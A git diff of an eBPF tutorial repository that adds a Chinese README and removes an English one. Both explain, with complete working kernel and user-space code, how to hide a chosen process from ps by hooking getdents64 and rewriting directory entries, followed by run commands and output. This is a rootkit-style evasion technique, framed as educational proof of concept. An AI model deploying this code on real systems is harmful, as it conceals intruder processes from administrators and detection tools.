+```c + +SEC("tp/syscalls/sys_exit_getdents64") +int handle_getdents_exit(struct trace_event_raw_sys_exit *ctx) +{ + size_t pid_tgid = bpf_get_current_pid_tgid(); + int total_bytes_read = ctx->ret; + // if bytes_read is 0, everything's been read + if (total_bytes_read <= 0) { + return 0; + } + + // Check we stored the address of the buffer from the syscall entry + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buffs, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + + // All of this is quite complex, but basically boils down to + // Calling 'handle_getdents_exit' in a loop to iterate over the file listing + // in chunks of 200, and seeing if a folder with the name of our pid is in there. + // If we find it, use 'bpf_tail_call' to jump to handle_getdents_patch to do the actual + // patching + long unsigned int buff_addr = *pbuff_addr; + struct linux_dirent64 *dirp = 0; + int pid = pid_tgid >> 32; + short unsigned int d_reclen = 0; + char filename[MAX_PID_LEN]; + + unsigned int bpos = 0; + unsigned int *pBPOS = bpf_map_lookup_elem(&map_bytes_read, &pid_tgid); + if (pBPOS != 0) { + bpos = *pBPOS; + } + + for (int i = 0; i < 200; i ++) { + if (bpos >= total_bytes_read) { + break; + } + dirp = (struct linux_dirent64 *)(buff_addr+bpos); + bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen); + bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name); + + int j = 0; + for (j = 0; j < pid_to_hide_len; j++) { + if (filename[j] != pid_to_hide[j]) { + break; + } + } + if (j == pid_to_hide_len) { + // *********** + // We've found the folder!!! + // Jump to handle_getdents_patch so we can remove it! + // *********** + bpf_map_delete_elem(&map_bytes_read, &pid_tgid); + bpf_map_delete_elem(&map_buffs, &pid_tgid); + bpf_tail_call(ctx, &map_prog_array, PROG_02); + } + bpf_map_update_elem(&map_to_patch, &pid_tgid, &dirp, BPF_ANY); + bpos += d_reclen; + } + + // If we didn't find it, but there's still more to read, + // jump back the start of this function and keep looking + if (bpos < total_bytes_read) { + bpf_map_update_elem(&map_bytes_read, &pid_tgid, &bpos, BPF_ANY); + bpf_tail_call(ctx, &map_prog_array, PROG_01); + } + bpf_map_delete_elem(&map_bytes_read, &pid_tgid); + bpf_map_delete_elem(&map_buffs, &pid_tgid); + + return 0; +} + +``` + +在这个函数中,我们首先获取了当前进程的 PID 和线程组 ID,然后检查系统调用是否读取到了目录的内容。如果没有读取到内容,我们就直接返回。 + +然后我们从 `map_buffs` 这个 map 中获取 `getdents64` 系统调用入口处保存的目录内容的地址。如果我们没有保存过这个地址,那么就没有必要进行进一步的处理。 + +接下来的部分有点复杂,我们用了一个循环来迭代读取目录的内容,并且检查是否有我们想要隐藏的进程的 PID。如果我们找到了,我们就用 `bpf_tail_call` 函数跳转到 `handle_getdents_patch` 函数,进行实际的隐藏操作。 + +```c +SEC("tp/syscalls/sys_exit_getdents64") +int handle_getdents_patch(struct trace_event_raw_sys_exit *ctx) +{ + // Only patch if we've already checked and found our pid's folder to hide + size_t pid_tgid = bpf_get_current_pid_tgid(); + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_to_patch, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + + // Unlink target, by reading in previous linux_dirent64 struct, + // and setting it's d_reclen to cover itself and our target. + // This will make the program skip over our folder. 
+ long unsigned int buff_addr = *pbuff_addr; + struct linux_dirent64 *dirp_previous = (struct linux_dirent64 *)buff_addr; + short unsigned int d_reclen_previous = 0; + bpf_probe_read_user(&d_reclen_previous, sizeof(d_reclen_previous), &dirp_previous->d_reclen); + + struct linux_dirent64 *dirp = (struct linux_dirent64 *)(buff_addr+d_reclen_previous); + short unsigned int d_reclen = 0; + bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen); + + // Debug print + char filename[MAX_PID_LEN]; + bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp_previous->d_name); + filename[pid_to_hide_len-1] = 0x00; + bpf_printk("[PID_HIDE] filename previous %s\n", filename); + bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name); + filename[pid_to_hide_len-1] = 0x00; + bpf_printk("[PID_HIDE] filename next one %s\n", filename); + + // Attempt to overwrite + short unsigned int d_reclen_new = d_reclen_previous + d_reclen; + long ret = bpf_probe_write_user(&dirp_previous->d_reclen, &d_reclen_new, sizeof(d_reclen_new)); + + // Send an event + struct event *e; + e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); + if (e) { + e->success = (ret == 0); + e->pid = (pid_tgid >> 32); + bpf_get_current_comm(&e->comm, sizeof(e->comm)); + bpf_ringbuf_submit(e, 0); + } + + bpf_map_delete_elem(&map_to_patch, &pid_tgid); + return 0; +} + +``` + +在 `handle_getdents_patch` 函数中,我们首先检查我们是否已经找到了我们想要隐藏的进程的 PID。然后我们读取目录项的内容,并且修改 `d_reclen` 字段,让它覆盖下一个目录项,这样就可以隐藏我们的目标进程了。 + +在这个过程中,我们用到了 `bpf_probe_read_user`、`bpf_probe_read_user_str`、`bpf_probe_write_user` 这几个函数来读取和写入用户空间的数据。这是因为在内核空间,我们不能直接访问用户空间的数据,必须使用这些特殊的函数。 + +在我们完成隐藏操作后,我们会向一个名为 `rb` 的环形缓冲区发送一个事件,表示我们已经成功地隐藏了一个进程。我们用 `bpf_ringbuf_reserve` 函数来预留缓冲区空间,然后将事件的数据填充到这个空间,并最后用 `bpf_ringbuf_submit` 函数将事件提交到缓冲区。 + +最后,我们清理了之前保存在 map 中的数据,并返回。 + +这段代码是在 eBPF 环境下实现进程隐藏的一个很好的例子。通过这个例子,我们可以看到 eBPF 提供的丰富的功能,如系统调用跟踪、map 存储、用户空间数据访问、尾调用等。这些功能使得我们能够在内核空间实现复杂的逻辑,而不需要修改内核代码。 + +## 用户态 eBPF 程序实现 + +我们在用户态的 eBPF 程序中主要进行了以下几个操作: + +1. 打开 eBPF 程序。 +2. 设置我们想要隐藏的进程的 PID。 +3. 验证并加载 eBPF 程序。 +4. 
等待并处理由 eBPF 程序发送的事件。 + +首先,我们打开了 eBPF 程序。这个过程是通过调用 `pidhide_bpf__open` 函数实现的。如果这个过程失败了,我们就直接返回。 + +```c + skel = pidhide_bpf__open(); + if (!skel) + { + fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno)); + return 1; + } +``` + +接下来,我们设置了我们想要隐藏的进程的 PID。这个过程是通过将 PID 保存到 eBPF 程序的 `rodata` 区域实现的。默认情况下,我们隐藏的是当前进程。 + +```c + char pid_to_hide[10]; + if (env.pid_to_hide == 0) + { + env.pid_to_hide = getpid(); + } + sprintf(pid_to_hide, "%d", env.pid_to_hide); + strncpy(skel->rodata->pid_to_hide, pid_to_hide, sizeof(skel->rodata->pid_to_hide)); + skel->rodata->pid_to_hide_len = strlen(pid_to_hide) + 1; + skel->rodata->target_ppid = env.target_ppid; +``` + +然后,我们验证并加载 eBPF 程序。这个过程是通过调用 `pidhide_bpf__load` 函数实现的。如果这个过程失败了,我们就进行清理操作。 + +```c + err = pidhide_bpf__load(skel); + if (err) + { + fprintf(stderr, "Failed to load and verify BPF skeleton\n"); + goto cleanup; + } +``` + +最后,我们等待并处理由 eBPF 程序发送的事件。这个过程是通过调用 `ring_buffer__poll` 函数实现的。在这个过程中,我们每隔一段时间就检查一次环形缓冲区中是否有新的事件。如果有,我们就调用 `handle_event` 函数来处理这个事件。 + +```c +printf("Successfully started!\n"); +printf("Hiding PID %d\n", env.pid_to_hide); +while (!exiting) +{ + err = ring_buffer__poll(rb, 100 /* timeout, ms */); + /* Ctrl-C will cause -EINTR */ + if (err == -EINTR) + { + err = 0; + break; + } + if (err < 0) + { + printf("Error polling perf buffer: %d\n", err); + break; + } +} +``` + +`handle_event` 函数中,我们根据事件的内容打印了相应的消息。这个函数的参数包括一个上下文,事件的数据,以及数据的大小。我们首先将事件的数据转换为 `event` 结构体,然后根据 `success` 字段判断这个事件是否表示成功隐藏了一个进程,最后打 + +印相应的消息。 + +```c +static int handle_event(void *ctx, void *data, size_t data_sz) +{ + const struct event *e = data; + if (e->success) + printf("Hid PID from program %d (%s)\n", e->pid, e->comm); + else + printf("Failed to hide PID from program %d (%s)\n", e->pid, e->comm); + return 0; +} +``` + +这段代码展示了如何在用户态使用 eBPF 程序来实现进程隐藏的功能。我们首先打开 eBPF 程序,然后设置我们想要隐藏的进程的 PID,再验证并加载 eBPF 程序,最后等待并处理由 eBPF 程序发送的事件。这个过程中,我们使用了 eBPF 提供的一些高级功能,如环形缓冲区和事件处理,这些功能使得我们能够在用户态方便地与内核态的 eBPF 程序进行交互。 + +完整源代码: + +> 本文所示技术仅为概念验证,仅供学习使用,严禁用于不符合法律法规要求的场景。 + +## 编译运行,隐藏 PID + +首先,我们需要编译 eBPF 程序: + +```bash +make +``` + +然后,假设我们想要隐藏进程 ID 为 1534 的进程,可以运行如下命令: + +```sh +sudo ./pidhide --pid-to-hide 1534 +``` + +这条命令将使所有尝试读取 `/proc/` 目录的操作都无法看到 PID 为 1534 的进程。例如,我们可以选择一个进程进行隐藏: + +```console +$ ps -aux | grep 1534 +yunwei 1534 0.0 0.0 244540 6848 ? 
Ssl 6月02 0:00 /usr/libexec/gvfs-mtp-volume-monitor +yunwei 32065 0.0 0.0 17712 2580 pts/1 S+ 05:43 0:00 grep --color=auto 1534 +``` + +此时通过 ps 命令可以看到进程 ID 为 1534 的进程。但是,如果我们运行 `sudo ./pidhide --pid-to-hide 1534`,再次运行 `ps -aux | grep 1534`,就会发现进程 ID 为 1534 的进程已经不见了。 + +```console +$ sudo ./pidhide --pid-to-hide 1534 +Hiding PID 1534 +Hid PID from program 31529 (ps) +Hid PID from program 31551 (ps) +Hid PID from program 31560 (ps) +Hid PID from program 31582 (ps) +Hid PID from program 31582 (ps) +Hid PID from program 31585 (bash) +Hid PID from program 31585 (bash) +Hid PID from program 31609 (bash) +Hid PID from program 31640 (ps) +Hid PID from program 31649 (ps) +``` + +这个程序将匹配这个 pid 的进程隐藏,使得像 `ps` 这样的工具无法看到,我们可以通过 `ps aux | grep 1534` 来验证。 + +```console +$ ps -aux | grep 1534 +root 31523 0.1 0.0 22004 5616 pts/2 S+ 05:42 0:00 sudo ./pidhide -p 1534 +root 31524 0.0 0.0 22004 812 pts/3 Ss 05:42 0:00 sudo ./pidhide -p 1534 +root 31525 0.3 0.0 3808 2456 pts/3 S+ 05:42 0:00 ./pidhide -p 1534 +yunwei 31583 0.0 0.0 17712 2612 pts/1 S+ 05:42 0:00 grep --color=auto 1534 +``` + +## 总结 + +通过本篇 eBPF 入门实践教程,我们深入了解了如何使用 eBPF 来隐藏进程或文件信息。我们学习了如何编写和加载 eBPF 程序,如何通过 eBPF 拦截系统调用并修改它们的行为,以及如何将这些知识应用到实际的网络安全和防御工作中。此外,我们也了解了 eBPF 的强大性,尤其是它能在不需要修改内核源代码或重启内核的情况下,允许用户在内核中执行自定义代码的能力。 + +您还可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 diff --git a/src/24-hide/README_en.md b/src/24-hide/README_en.md deleted file mode 100644 index 437af5a..0000000 --- a/src/24-hide/README_en.md +++ /dev/null @@ -1,429 +0,0 @@ -# eBPF Practical Tutorial: Hiding Process or File Information - -eBPF (Extended Berkeley Packet Filter) is a powerful feature in the Linux kernel that allows you to run, load, and update user-defined code without having to change the kernel source code or reboot the kernel. This capability allows eBPF to be used in a wide range of applications such as network and system performance analysis, packet filtering, and security policies. - -In this tutorial, we will show how eBPF can be used to hide process or file information, a common technique in the field of network security and defence. - -## Background Knowledge and Implementation Mechanism - -"Process hiding" enables a specific process to become invisible to the operating system's regular detection mechanisms. This technique can be used in both hacking and system defence scenarios. Specifically, each process on a Linux system has a subfolder named after its process ID in the /proc/ directory, which contains various information about the process. `ps` displays process information by looking in these folders. Therefore, if we can hide the /proc/ folder of a process, we can make that process invisible to `ps` commands and other detection methods. - -The key to achieving process hiding is to manipulate the `/proc/` directory. In Linux, the `getdents64` system call can read the information of files in the directory. We can hide files by hooking into this system call and modifying the results it returns. To do this, you need to use eBPF's `bpf_probe_write_user` function, which can modify user-space memory, and therefore can be used to modify the results returned by `getdents64`. - -In the following, we will describe in detail how to write eBPF programs in both kernel and user states to implement process hiding. - -### Kernel eBPF Program Implementation - -Next, we will describe in detail how to write eBPF program to implement process hiding in kernel state. 
The first part of the eBPF programme is the start: - -```c -// SPDX-License-Identifier: BSD-3-Clause -#include "vmlinux.h" -#include -#include -#include -#include "common.h" - -char LICENSE[] SEC("license") = "Dual BSD/GPL"; - -// Ringbuffer Map to pass messages from kernel to user -struct { - __uint(type, BPF_MAP_TYPE_RINGBUF); - __uint(max_entries, 256 * 1024); -} rb SEC(".maps"); - -// Map to fold the dents buffer addresses -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, 8192); - __type(key, size_t); - __type(value, long unsigned int); -} map_buffs SEC(".maps"); - -// Map used to enable searching through the -// data in a loop -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, 8192); - __type(key, size_t); - __type(value, int); -} map_bytes_read SEC(".maps"); - -// Map with address of actual -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, 8192); - __type(key, size_t); - __type(value, long unsigned int); -} map_to_patch SEC(".maps"); - -// Map to hold program tail calls -struct { - __uint(type, BPF_MAP_TYPE_PROG_ARRAY); - __uint(max_entries, 5); - __type(key, __u32); - __type(value, __u32); -} map_prog_array SEC(".maps"); -``` - -The first thing we need to do is to understand the basic structure of the eBPF programme and the important components that are used. The first few lines reference several important header files, such as "vmlinux.h", "bpf_helpers.h", "bpf_tracing.h" and "bpf_core_read.h". These files provide the infrastructure needed for eBPF programming and some important functions or macros. - -- "vmlinux.h" is a header file containing the complete kernel data structures extracted from the vmlinux kernel binary. Using this header file, eBPF programs can access kernel data structures. -- The "bpf_helpers.h" header file defines a series of macros that encapsulate the BPF helper functions used by eBPF programs. These BPF helper functions are the main way that eBPF programs interact with the kernel. -- The "bpf_tracing.h" header file for tracing events contains a number of macros and functions designed to simplify the operation of tracepoints for eBPF programs. -- The "bpf_core_read.h" header file provides a set of macros and functions for reading data from the kernel. - -The program defines a series of map structures, which are the main data structures in an eBPF program, and are used to share data between the kernel and the user, or to store and transfer data within the eBPF program. - -Among them, "rb" is a map of type Ringbuffer, which is used to pass messages from the kernel to the userland; Ringbuffer is a data structure that can efficiently pass large amounts of data between the kernel and the userland. - -"map_buffs" is a map of type Hash which is used to store buffer addresses for directory entries. - -"map_bytes_read" is another Hash-type map that is used to enable searching in data loops. - -"map_to_patch" is another Hash type map that stores the address of the directory entry (dentry) that needs to be modified. - -"map_prog_array" is a map of type Prog Array, which is used to store the tail calls of a programme. - -The "target_ppid" and "pid_to_hide_len" and "pid_to_hide" in the program are a few important global variables that store the PID of the target parent process, the length of the PID that needs to be hidden, and the PID that needs to be hidden, respectively. - -In the next part of the code, the program defines a structure called "linux_dirent64", which represents a Linux directory entry. 
The program then defines two functions, "handle_getdents_enter" and "handle_getdents_exit", which are called at the entry and exit of the getdents64 system call, respectively, and are used to implement operations on the directory entry. - -```c - -// Optional Target Parent PID -const volatile int target_ppid = 0; - -// These store the string representation -// of the PID to hide. This becomes the name -// of the folder in /proc/ -const volatile int pid_to_hide_len = 0; -const volatile char pid_to_hide[MAX_PID_LEN]; - -// struct linux_dirent64 { -// u64 d_ino; /* 64-bit inode number */ -// u64 d_off; /* 64-bit offset to next structure */ -// unsigned short d_reclen; /* Size of this dirent */ -// unsigned char d_type; /* File type */ -// char d_name[]; /* Filename (null-terminated) */ }; -// int getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count); -SEC("tp/syscalls/sys_enter_getdents64") -int handle_getdents_enter(struct trace_event_raw_sys_enter *ctx) -{ - size_t pid_tgid = bpf_get_current_pid_tgid(); - // Check if we're a process thread of interest - // if target_ppid is 0 then we target all pids - if (target_ppid != 0) { - struct task_struct *task = (struct task_struct *)bpf_get_current_task(); - int ppid = BPF_CORE_READ(task, real_parent, tgid); - if (ppid != target_ppid) { - return 0; - } - } - int pid = pid_tgid >> 32; - unsigned int fd = ctx->args[0]; - unsigned int buff_count = ctx->args[2]; - - // Store params in map for exit function - struct linux_dirent64 *dirp = (struct linux_dirent64 *)ctx->args[1]; - bpf_map_update_elem(&map_buffs, &pid_tgid, &dirp, BPF_ANY); - - return 0; -} -``` - -In this section of the code, we can see part of the implementation of the eBPF program that is responsible for the processing at the entry point of the `getdents64` system call. - -We start by declaring a few global variables. The `target_ppid` represents the PID of the target parent we want to focus on, and if this value is 0, then we will focus on all processes. `pid_to_hide_len` and `pid_to_hide` are used to store the length of the PID of the process we want to hide from, and the PID itself, respectively. This PID is translated into the name of a folder in the `/proc/` directory, so the hidden process will not be visible in the `/proc/` directory. - -Next, we declare a structure called `linux_dirent64`. This structure represents a Linux directory entry and contains metadata such as the inode number, the offset of the next directory entry, the length of the current directory entry, the file type, and the filename. - -Then there is the prototype for the `getdents64` function. This function is a Linux system call that reads the contents of a directory. Our goal is to modify the directory entries during the execution of this function to enable process hiding. - -The subsequent section is the concrete implementation of the eBPF program. We define a function called `handle_getdents_enter` at the entry point of the `getdents64` system call. This function first gets the PID and thread group ID of the current process, and then checks to see if it is the process we are interested in. If we set `target_ppid`, then we only focus on processes whose parent has a PID of `target_ppid`. If `target_ppid` is 0, we focus on all processes. - -After confirming that the current process is the one we are interested in, we save the arguments to the `getdents64` system call into a map to be used when the system call returns. 
In particular, we focus on the second argument to the `getdents64` system call, which is a pointer to the `linux_dirent64` structure representing the contents of the directory to be read by the system call. We save this pointer, along with the current PID and thread group ID, as a key-value pair in the `map_buffs` map. - -This completes the processing at the entry point of the `getdents64` system call. When the system call returns, we will modify the directory entry in the `handle_getdents_exit` function to hide the process. - -In the next snippet, we will implement the handling at the return of the `getdents64` system call. Our main goal is to find the process we want to hide and modify the directory entry to hide it. - -We start by defining a function called `handle_getdents_exit` that will be called when the `getdents64` system call returns. - -```c - -SEC("tp/syscalls/sys_exit_getdents64") -int handle_getdents_exit(struct trace_event_raw_sys_exit *ctx) -{ - size_t pid_tgid = bpf_get_current_pid_tgid(); - int total_bytes_read = ctx->ret; - // if bytes_read is 0, everything's been read - if (total_bytes_read <= 0) { - return 0; - } - - // Check we stored the address of the buffer from the syscall entry - long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buffs, &pid_tgid); - if (pbuff_addr == 0) { - return 0; - } - - // All of this is quite complex, but basically boils down to - // Calling 'handle_getdents_exit' in a loop to iterate over the file listing - // in chunks of 200, and seeing if a folder with the name of our pid is in there. - // If we find it, use 'bpf_tail_call' to jump to handle_getdents_patch to do the actual - // patching - long unsigned int buff_addr = *pbuff_addr; - struct linux_dirent64 *dirp = 0; - int pid = pid_tgid >> 32; - short unsigned int d_reclen = 0; - char filename[MAX_PID_LEN]; - - unsigned int bpos = 0; - unsigned int *pBPOS = bpf_map_lookup_elem(&map_bytes_read, &pid_tgid); - if (pBPOS != 0) { - bpos = *pBPOS; - } - - for (int i = 0; i < 200; i ++) { - if (bpos >= total_bytes_read) { - break; - } - dirp = (struct linux_dirent64 *)(buff_addr+bpos); - bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen); - bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name); - - int j = 0; - for (j = 0; j < pid_to_hide_len; j++) { - if (filename[j] != pid_to_hide[j]) { - break; - } - } - if (j == pid_to_hide_len) { - // *********** - // We've found the folder!!! - // Jump to handle_getdents_patch so we can remove it! - // *********** - bpf_map_delete_elem(&map_bytes_read, &pid_tgid); - bpf_map_delete_elem(&map_buffs, &pid_tgid); - bpf_tail_call(ctx, &map_prog_array, PROG_02); - } - bpf_map_update_elem(&map_to_patch, &pid_tgid, &dirp, BPF_ANY); - bpos += d_reclen; - } - - // If we didn't find it, but there's still more to read, - // jump back the start of this function and keep looking - if (bpos < total_bytes_read) { - bpf_map_update_elem(&map_bytes_read, &pid_tgid, &bpos, BPF_ANY); - bpf_tail_call(ctx, &map_prog_array, PROG_01); - } - bpf_map_delete_elem(&map_bytes_read, &pid_tgid); - bpf_map_delete_elem(&map_buffs, &pid_tgid); - - return 0; -} - -``` - -In this function, we first get the PID and thread group ID of the current process, and then check to see if the system call has read the contents of the directory. If it didn't read the contents, we just return. - -Then we get the address of the directory contents saved at the entry point of the `getdents64` system call from the `map_buffs` map. 
If we haven't saved this address, then there's no need to do any further processing. - -The next part is a bit more complicated, we use a loop to iteratively read the contents of the directory and check to see if we have the PID of the process we want to hide, and if we do, we use the `bpf_tail_call` function to jump to the `handle_getdents_patch` function to do the actual hiding. - -```c -SEC("tp/syscalls/sys_exit_getdents64") -int handle_getdents_patch(struct trace_event_raw_sys_exit *ctx) -{ - // Only patch if we've already checked and found our pid's folder to hide - size_t pid_tgid = bpf_get_current_pid_tgid(); - long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_to_patch, &pid_tgid); - if (pbuff_addr == 0) { - return 0; - } - - // Unlink target, by reading in previous linux_dirent64 struct, - // and setting it's d_reclen to cover itself and our target. - // This will make the program skip over our folder. - long unsigned int buff_addr = *pbuff_addr; - struct linux_dirent64 *dirp_previous = (struct linux_dirent64 *)buff_addr; - short unsigned int d_reclen_previous = 0; - bpf_probe_read_user(&d_reclen_previous, sizeof(d_reclen_previous), &dirp_previous->d_reclen); - - struct linux_dirent64 *dirp = (struct linux_dirent64 *)(buff_addr+d_reclen_previous); - short unsigned int d_reclen = 0; - bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen); - - // Debug print - char filename[MAX_PID_LEN]; - bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp_previous->d_name); - filename[pid_to_hide_len-1] = 0x00; - bpf_printk("[PID_HIDE] filename previous %s\n", filename); - bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name); - filename[pid_to_hide_len-1] = 0x00; - bpf_printk("[PID_HIDE] filename next one %s\n", filename); - - // Attempt to overwrite - short unsigned int d_reclen_new = d_reclen_previous + d_reclen; - long ret = bpf_probe_write_user(&dirp_previous->d_reclen, &d_reclen_new, sizeof(d_reclen_new)); - - // Send an event - struct event *e; - e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); - if (e) { - e->success = (ret == 0); - e->pid = (pid_tgid >> 32); - bpf_get_current_comm(&e->comm, sizeof(e->comm)); - bpf_ringbuf_submit(e, 0); - } - - bpf_map_delete_elem(&map_to_patch, &pid_tgid); - return 0; -} - -``` - -In the `handle_getdents_patch` function, we first check to see if we have found the PID of the process we want to hide, and then we read the contents of the directory entry and modify the `d_reclen` field so that it overwrites the next directory entry, thus hiding our target process. - -In this process, we use the functions `bpf_probe_read_user`, `bpf_probe_read_user_str`, and `bpf_probe_write_user` to read and write user-space data. This is because in kernel space, we can't access user space data directly and must use these special functions. - -After we finish the hiding operation, we send an event to a ring buffer called `rb` indicating that we have successfully hidden a process. We reserve space in the buffer with the `bpf_ringbuf_reserve` function, then fill that space with the event's data, and finally commit the event to the buffer with the `bpf_ringbuf_submit` function. - -Finally, we clean up the data previously saved in the map and return. - -This code is a good example of process hiding in an eBPF environment. Through this example, we can see the rich features provided by eBPF, such as system call tracing, map storage, user-space data access, tail calls, and so on. 
These features allow us to implement complex logic in kernel space without modifying the kernel code. - -## User-Style eBPF Programming - -We perform the following operations in the userland eBPF program: - -1. Open the eBPF program. -2. Set the PID of the process we want to hide. -3. Verify and load the eBPF program. -4. Wait for and process events sent by the eBPF program. - -First, we open the eBPF application. This is done by calling the `pidhide_bpf__open` function. If this process fails, we simply return. - -```c - skel = pidhide_bpf__open(); - if (!skel) - { - fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno)); - return 1; - } -``` - -Next, we set the PIDs of the processes we want to hide, which is done by saving the PIDs to the `rodata` area of the eBPF program. By default, we hide the current process. - -```c - char pid_to_hide[10]; - if (env.pid_to_hide == 0) - { - env.pid_to_hide = getpid(); - } - sprintf(pid_to_hide, "%d", env.pid_to_hide); - strncpy(skel->rodata->pid_to_hide, pid_to_hide, sizeof(skel->rodata->pid_to_hide)); - skel->rodata->pid_to_hide_len = strlen(pid_to_hide) + 1; - skel->rodata->target_ppid = env.target_ppid; -``` - -We then validate and load the eBPF program. This is done by calling the `pidhide_bpf__load` function. If this process fails, we perform a cleanup operation. - -```c - err = pidhide_bpf__load(skel); - if (err) - { - fprintf(stderr, "Failed to load and verify BPF skeleton\n"); - goto cleanup; - } -``` - -Finally, we wait for and process events sent by the eBPF program. This process is achieved by calling the `ring_buffer__poll` function. During this process, we check the ring buffer every so often for new events. If there is, we call the `handle_event` function to handle the event. - -```c -printf("Successfully started!\n"); -printf("Hiding PID %d\n", env.pid_to_hide); -while (!exiting) -{ - err = ring_buffer__poll(rb, 100 /* timeout, ms */); - /* Ctrl-C will cause -EINTR */ - if (err == -EINTR) - { - err = 0; - break; - } - if (err < 0) - { - printf("Error polling perf buffer: %d\n", err); - break; - } -} -``` - -In the `handle_event` function, we print the appropriate message based on the content of the event. The arguments to this function include a context, the data of the event, and the size of the data. We first convert the event data into an `event` structure, then determine if the event successfully hides a process based on the `success` field, and finally print the corresponding message. - -and then print the corresponding message. - -```c -static int handle_event(void *ctx, void *data, size_t data_sz) -{ - const struct event *e = data; - if (e->success) - printf("Hid PID from program %d (%s)\n", e->pid, e->comm); - else - printf("Failed to hide PID from program %d (%s)\n", e->pid, e->comm); - return 0; -} -``` - -This code shows how to use the eBPF programme to hide a process in the user state. We first open the eBPF application, then set the PID of the process we want to hide, then validate and load the eBPF application, and finally wait for and process the events sent by the eBPF application. This process makes use of some advanced features provided by eBPF, such as ring buffers and event handling, which allow us to easily interact with the kernel state eBPF program from the user state. 
- -Full source code: https: [//github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/24-hide](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/24-hide) - -> The techniques shown in this paper are for proof of concept only and are intended for learning purposes only, and are not to be used in scenarios that do not comply with legal or regulatory requirements. - -## Compile and Run - -```bash -make -``` - -```sh -sudo ./pidhide --pid-to-hide 1534 -``` - -```console -$ ps -aux | grep 1534 -yunwei 1534 0.0 0.0 244540 6848 ? Ssl 6月02 0:00 /usr/libexec/gvfs-mtp-volume-monitor -yunwei 32065 0.0 0.0 17712 2580 pts/1 S+ 05:43 0:00 grep --color=auto 1534 -``` - -```console -$ sudo ./pidhide --pid-to-hide 1534 -Hiding PID 1534 -Hid PID from program 31529 (ps) -Hid PID from program 31551 (ps) -Hid PID from program 31560 (ps) -Hid PID from program 31582 (ps) -Hid PID from program 31582 (ps) -Hid PID from program 31585 (bash) -Hid PID from program 31585 (bash) -Hid PID from program 31609 (bash) -Hid PID from program 31640 (ps) -Hid PID from program 31649 (ps) -``` - -```console -$ ps -aux | grep 1534 -root 31523 0.1 0.0 22004 5616 pts/2 S+ 05:42 0:00 sudo ./pidhide -p 1534 -root 31524 0.0 0.0 22004 812 pts/3 Ss 05:42 0:00 sudo ./pidhide -p 1534 -root 31525 0.3 0.0 3808 2456 pts/3 S+ 05:42 0:00 ./pidhide -p 1534 -yunwei 31583 0.0 0.0 17712 2612 pts/1 S+ 05:42 0:00 grep --color=auto 1534 -``` - -## Summary - -You can also visit our tutorial code repository [at https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website [at https://eunomia.dev/zh/tutorials/](https://eunomia.dev/zh/tutorials/) for more examples and the full tutorial. - -> The original link of this article: diff --git a/src/25-signal/README.md b/src/25-signal/README.md index be96d62..3160ac3 100644 --- a/src/25-signal/README.md +++ b/src/25-signal/README.md @@ -1,54 +1,60 @@ -# eBPF 入门实践教程:用 bpf_send_signal 发送信号终止恶意进程 +# Using bpf_send_signal to Terminate Malicious Processes in eBPF -eBPF (扩展的伯克利数据包过滤器) 是 Linux 内核的一种革命性技术,允许用户在内核空间执行自定义程序,而不需要修改内核源代码或加载任何内核模块。这使得开发人员可以非常灵活地对 Linux 系统进行观测、修改和控制。 +eBPF (Extended Berkeley Packet Filter) is a revolutionary technology in the Linux kernel that allows users to execute custom programs in kernel space without modifying the kernel source code or loading any kernel modules. This provides developers with great flexibility to observe, modify, and control the Linux system. -本文介绍了如何使用 eBPF 的 bpf_send_signal 功能,向指定的进程发送信号进行干预。本文完整的源代码和更多的教程文档,请参考 +This article introduces how to use the `bpf_send_signal` feature of eBPF to intervene by sending signals to specified processes. For more tutorial documentation and complete source code, please refer to . -## 使用场景 +## Use Cases -**1. 性能分析:** -在现代软件生态系统中,优化应用程序的性能是开发人员和系统管理员的一个核心任务。当应用程序,如 hhvm,出现运行缓慢或资源利用率异常高时,它可能会对整个系统产生不利影响。因此,定位这些性能瓶颈并及时解决是至关重要的。 +**1. Performance Issues:** -**2. 异常检测与响应:** -任何运行在生产环境中的系统都可能面临各种异常情况,从简单的资源泄露到复杂的恶意软件攻击。在这些情况下,系统需要能够迅速、准确地检测到这些异常,并采取适当的应对措施。 +Optimizing the performance of applications is a core task for developers and system administrators in the modern software ecosystem. When applications, such as hhvm, run slowly or have abnormally high resource utilization, they can adversely affect the entire system. Therefore, pinpointing these performance bottlenecks and resolving them promptly is crucial. -**3. 动态系统管理:** -随着云计算和微服务架构的普及,能够根据当前系统状态动态调整资源配置和应用行为已经成为了一个关键需求。例如,根据流量波动自动扩容或缩容,或者在检测到系统过热时降低 CPU 频率。 +**2. 
